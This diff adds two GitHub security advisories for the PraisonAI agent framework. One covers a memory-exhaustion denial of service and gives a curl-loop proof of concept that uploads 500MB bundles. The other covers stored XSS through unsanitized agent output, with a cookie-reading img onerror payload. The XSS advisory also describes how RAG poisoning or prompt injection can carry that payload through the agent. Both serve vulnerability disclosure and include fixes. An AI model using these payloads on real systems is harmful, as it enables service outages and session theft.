github
diff --git a/‎advisories/github-reviewed/2026/04/GHSA-2xgv-5cv2-47vv/GHSA-2xgv-5cv2-47vv.json‎
Lines changed: 65 additions & 0 deletions b/‎advisories/github-reviewed/2026/04/GHSA-2xgv-5cv2-47vv/GHSA-2xgv-5cv2-47vv.json‎
Lines changed: 65 additions & 0 deletions
diff --git a/‎advisories/github-reviewed/2026/04/GHSA-cfg2-mxfj-j6pw/GHSA-cfg2-mxfj-j6pw.json‎
Lines changed: 65 additions & 0 deletions b/‎advisories/github-reviewed/2026/04/GHSA-cfg2-mxfj-j6pw/GHSA-cfg2-mxfj-j6pw.json‎
Lines changed: 65 additions & 0 deletions
@@ -0,0 +1,65 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-2xgv-5cv2-47vv",
+  "modified": "2026-04-10T19:23:13Z",
+  "published": "2026-04-10T19:23:13Z",
+  "aliases": [
+    "CVE-2026-40115"
+  ],
+  "summary": "PraisonAI has Unrestricted Upload Size in WSGI Recipe Registry Server that Enables Memory Exhaustion DoS",
+  "details": "## Summary\n\nThe WSGI-based recipe registry server (`server.py`) reads the entire HTTP request body into memory based on the client-supplied `Content-Length` header with no upper bound. Combined with authentication being disabled by default (no token configured), any local process can send arbitrarily large POST requests to exhaust server memory and cause a denial of service. The Starlette-based server (`serve.py`) has `RequestSizeLimitMiddleware` with a 10MB limit, but the WSGI server lacks any equivalent protection.\n\n## Details\n\nThe vulnerable code path in `src/praisonai/praisonai/recipe/server.py`:\n\n**1. No size limit on body read (line 551-555):**\n```python\ncontent_length = int(environ.get(\"CONTENT_LENGTH\", 0))\nbody = environ[\"wsgi.input\"].read(content_length) if content_length > 0 else b\"\"\n```\n\nThe `content_length` is taken directly from the HTTP header with no maximum check. The entire body is read into a single `bytes` object in memory.\n\n**2. Second in-memory copy via multipart parsing (line 169-172):**\n```python\nresult = {\"fields\": {}, \"files\": {}}\nboundary_bytes = f\"--{boundary}\".encode()\nparts = body.split(boundary_bytes)\n```\n\nThe `_parse_multipart` method splits the already-buffered body and stores file contents in a dict, creating additional in-memory copies.\n\n**3. Third copy to temp file (line 420-421):**\n```python\nwith tempfile.NamedTemporaryFile(suffix=\".praison\", delete=False) as tmp:\n    tmp.write(bundle_content)\n```\n\nThe bundle content is then written to disk and persisted in the registry, also without size checks.\n\n**4. Authentication disabled by default (line 91-94):**\n```python\ndef _check_auth(self, headers: Dict[str, str]) -> bool:\n    if not self.token:\n        return True  # No token configured = no auth\n```\n\nThe `self.token` defaults to `None` unless `PRAISONAI_REGISTRY_TOKEN` is set or `--token` is passed on the CLI.\n\nThe entry point is `praisonai registry serve` (cli/features/registry.py:176), which calls `run_server()` binding to `127.0.0.1:7777` by default.\n\nIn contrast, `serve.py` (the Starlette server) has `RequestSizeLimitMiddleware` at line 725-732 enforcing a 10MB default limit. The WSGI server has no equivalent.\n\n## PoC\n\n```bash\n# Start the registry server with default settings (no auth, localhost)\npraisonai registry serve &\n\n# Step 1: Create a large bundle (~500MB)\nmkdir -p /tmp/dos-test\necho '{\"name\":\"dos\",\"version\":\"1.0.0\"}' > /tmp/dos-test/manifest.json\ndd if=/dev/zero of=/tmp/dos-test/pad bs=1M count=500\ntar czf /tmp/dos-bundle.praison -C /tmp/dos-test .\n\n# Step 2: Upload — server buffers ~500MB into RAM with no limit\ncurl -X POST http://127.0.0.1:7777/v1/recipes/dos/1.0.0 \\\n  -F 'bundle=@/tmp/dos-bundle.praison' -F 'force=true'\n\n# Step 3: Repeat to exhaust memory\nfor v in 1.0.{1..10}; do\n  curl -X POST http://127.0.0.1:7777/v1/recipes/dos/$v \\\n    -F 'bundle=@/tmp/dos-bundle.praison' &\ndone\n# Server process will be OOM-killed\n```\n\n## Impact\n\n- **Memory exhaustion**: A single large request can consume all available memory, crashing the server process (and potentially other processes via OOM killer).\n- **Disk exhaustion**: Repeated uploads persist bundles to disk at `~/.praison/registry/` with no quota, potentially filling the filesystem.\n- **No authentication barrier**: Default configuration requires no token, so any local process (including via SSRF from other services on the same host) can trigger this.\n- **Availability impact**: The registry server becomes unavailable, blocking recipe publish/download operations.\n\nThe default bind address of `127.0.0.1` limits exploitability to local attackers or SSRF scenarios. If a user binds to `0.0.0.0` (common for shared environments or containers), the attack surface extends to the network.\n\n## Recommended Fix\n\nAdd a request size limit to the WSGI application, consistent with `serve.py`'s 10MB default:\n\n```python\n# In create_wsgi_app(), before reading the body:\nMAX_REQUEST_SIZE = 10 * 1024 * 1024  # 10MB, matching serve.py\n\ndef application(environ, start_response):\n    # ... existing code ...\n    \n    # Read body with size limit\n    try:\n        content_length = int(environ.get(\"CONTENT_LENGTH\", 0))\n    except (ValueError, TypeError):\n        content_length = 0\n    \n    if content_length > MAX_REQUEST_SIZE:\n        status = \"413 Request Entity Too Large\"\n        response_headers = [(\"Content-Type\", \"application/json\")]\n        body = json.dumps({\n            \"error\": {\n                \"code\": \"request_too_large\",\n                \"message\": f\"Request body too large. Max: {MAX_REQUEST_SIZE} bytes\"\n            }\n        }).encode()\n        start_response(status, response_headers)\n        return [body]\n    \n    body = environ[\"wsgi.input\"].read(content_length) if content_length > 0 else b\"\"\n    # ... rest of handler ...\n```\n\nAdditionally, consider:\n- Adding a `--max-request-size` CLI flag to `praisonai registry serve`\n- Adding per-recipe disk quota enforcement in `LocalRegistry.publish()`",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "PyPI",
+        "name": "PraisonAI"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "4.5.128"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-2xgv-5cv2-47vv"
+    },
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40115"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/MervinPraison/PraisonAI"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-770"
+    ],
+    "severity": "MODERATE",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-04-10T19:23:13Z",
+    "nvd_published_at": "2026-04-09T22:16:35Z"
+  }
+}
@@ -0,0 +1,65 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-cfg2-mxfj-j6pw",
+  "modified": "2026-04-10T19:22:18Z",
+  "published": "2026-04-10T19:22:18Z",
+  "aliases": [
+    "CVE-2026-40112"
+  ],
+  "summary": "PraisonAI Vulnerable to Stored XSS via Unsanitized Agent Output in HTML Rendering (nh3 Not a Required Dependency)",
+  "details": "## Summary\n\nThe Flask API endpoint in `src/praisonai/api.py` renders agent output as HTML without effective sanitization. The `_sanitize_html` function relies on the `nh3` library, which is not listed as a required or optional dependency in `pyproject.toml`. When `nh3` is absent (the default installation), the sanitizer is a no-op that returns HTML unchanged. An attacker who can influence agent input (via RAG data poisoning, web scraping results, or prompt injection) can inject arbitrary JavaScript that executes in the browser of anyone viewing the API output.\n\n## Details\n\nIn `src/praisonai/api.py`, lines 6-14 define the sanitizer with a try/except ImportError fallback:\n\n```python\ntry:\n    import nh3\n    def _sanitize_html(html: str) -> str:\n        return nh3.clean(html)\nexcept ImportError:\n    def _sanitize_html(html: str) -> str:\n        \"\"\"Fallback: no nh3, return as-is (install nh3 for XSS protection).\"\"\"\n        return html\n```\n\nThe `home()` route at lines 21-25 converts agent output to HTML via `markdown.markdown()` (which preserves raw HTML tags by default) and embeds it in an HTML response using an f-string — bypassing Flask's Jinja2 auto-escaping:\n\n```python\n@app.route('/')\ndef home():\n    output = basic()\n    html_output = _sanitize_html(markdown.markdown(str(output)))\n    return f'<html><body>{html_output}</body></html>'\n```\n\nSince `nh3` is not in any dependency list (`pyproject.toml` core deps, optional deps, or requirements files), a standard installation will always hit the fallback path. The `markdown` library's default behavior passes through raw HTML tags in input text, so any `<script>` or event handler attributes in the agent output flow directly into the response.\n\nAdditionally, `deploy.py:76-91` generates a deployment version of `api.py` that has **no sanitization at all** — it directly calls `markdown.markdown(output)` without any `_sanitize_html` wrapper.\n\n## PoC\n\n1. Set up a PraisonAI instance with an agent that processes external content (e.g., web scraping or RAG retrieval):\n\n```yaml\n# agents.yaml\nframework: crewai\ntopic: test\nroles:\n  researcher:\n    role: Researcher\n    goal: Process user-provided content\n    backstory: You process content exactly as given\n    tasks:\n      process:\n        description: \"Return this exact text: <img src=x onerror=alert(document.cookie)>\"\n        expected_output: The text as-is\n```\n\n2. Verify `nh3` is not installed (default):\n```bash\npip show nh3 2>&1 | grep -c \"not found\"\n# Returns 1 (not installed)\n```\n\n3. Start the API:\n```bash\npython src/praisonai/api.py\n```\n\n4. Access the endpoint:\n```bash\ncurl http://localhost:5000/\n```\n\n5. Response contains unsanitized HTML:\n```html\n<html><body><p><img src=x onerror=alert(document.cookie)></p></body></html>\n```\n\n6. Opening this in a browser executes the JavaScript payload.\n\n## Impact\n\n- **Session hijacking**: An attacker can steal cookies or session tokens from users viewing the API output.\n- **Credential theft**: Injected scripts can present fake login forms or exfiltrate data to attacker-controlled servers.\n- **Actions on behalf of users**: Malicious JavaScript can perform actions in the context of the victim's browser session.\n\nThe attack surface includes any scenario where agent output contains attacker-influenced content: RAG retrieval from poisoned documents, web scraping of malicious pages, processing of adversarial user prompts, or multi-agent communication where one agent's output is tainted.\n\n## Recommended Fix\n\nMake `nh3` a required dependency when using the API, and remove the silent fallback:\n\n```python\n# Option 1: Make nh3 required in pyproject.toml under the \"api\" optional dependency\n# In pyproject.toml:\n# api = [\n#     \"flask>=3.0.0\",\n#     ...\n#     \"nh3>=0.2.14\",\n# ]\n\n# Option 2: Use markdown's built-in HTML stripping as a safe default\nimport markdown\n\ndef _sanitize_html(html: str) -> str:\n    try:\n        import nh3\n        return nh3.clean(html)\n    except ImportError:\n        import re\n        return re.sub(r'<[^>]+>', '', html)  # Strip all HTML tags as fallback\n\n# Option 3 (preferred): Use Flask's Jinja2 templating with auto-escaping\n# instead of f-string interpolation, or use markupsafe.escape()\nfrom markupsafe import Markup\n\n@app.route('/')\ndef home():\n    output = basic()\n    # Use markdown with safe extensions only\n    html_output = markdown.markdown(str(output), extensions=[])\n    try:\n        import nh3\n        html_output = nh3.clean(html_output)\n    except ImportError:\n        raise RuntimeError(\"nh3 is required for safe HTML rendering. Install with: pip install nh3\")\n    return f'<html><body>{html_output}</body></html>'\n```\n\nAlso fix `deploy.py:76-91` to include sanitization in the generated `api.py`.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "PyPI",
+        "name": "PraisonAI"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "4.5.128"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-cfg2-mxfj-j6pw"
+    },
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40112"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/MervinPraison/PraisonAI"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-79"
+    ],
+    "severity": "MODERATE",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-04-10T19:22:18Z",
+    "nvd_published_at": "2026-04-09T22:16:34Z"
+  }
+}